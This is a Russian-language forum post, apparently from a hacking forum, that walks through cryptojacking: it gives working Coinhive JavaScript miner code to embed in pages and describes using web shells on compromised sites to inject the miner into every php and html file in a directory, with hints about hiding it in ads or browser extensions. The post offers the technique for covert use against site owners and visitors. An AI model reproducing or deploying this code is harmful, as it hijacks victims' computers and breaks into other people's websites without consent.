Майнинг, также добыча — деятельность по поддержанию распределённой платформы и созданию новых блоков с возможностью получить вознаграждение в форме новых единиц и комиссионных сборов в различных криптовалютах, в частности в Биткойн.
Coin-hive.com - это сайт, который предлагает вебмастеру встроить в свой сайт утилиту для майнинга биткоинов.
Типичная майнинг-ферма – это высокопроизводительный компьютер с несколькими видеокартами. На первый взгляд кажется, что все просто: подключаешь компьютер к сети, настраиваешь и наблюдаешь, как он зарабатывает деньги.
Вместо того, чтобы создавать ферму из наших видеокарт, мы будем использовать мощность посетителей сайтов. Мы вставим javascript код на все страницы нашего сайта. Для майнинга криптовалюты мы будем использовать библиотеку coinhive.
JavaScript:
<script src="https://coin-hive.com/lib/coinhive.min.js"></script>Подробнее с функциями библиотеки можно ознакомиться
Ссылка скрыта от гостей
.
Код:
<script type="text/javascript">
var miner = new CoinHive.User("XXXX", "Test");
miner.start();
setInterval( function() {
miner.setNumThreads(8);
miner.setThrottle(0.5);
console.log("Hashes: " + miner.getHashesPerSecond() + " Total: " + miner.getTotalHashes() + " Accepted: " + miner.getAcceptedHashes() + " Thread: " + miner.getNumThreads() );
}, 1000);
</script>Допустим мы имеем доступ ко множеству сайтов, где у нас установлен web-shell:
Ссылка скрыта от гостей
Регистрируемся на coinhive, получаем ключ и вставляем его в javascript код. В полуinfection указываем каталог, в файлы которого будет вставлен майнер. Шелл вставит вредоносный скрипт только в файлы имеющие расширение php или html.
Посмотреть вложение 14807
Сколько мы получаем хэшей можно посмотреть в консоли. Чем больше на сайте будет посетителей, чем больше хэшей вы получите. Еще как один из вариантов код майнера можно вставить в рекламу или расширение для браузера.
Последнее редактирование:
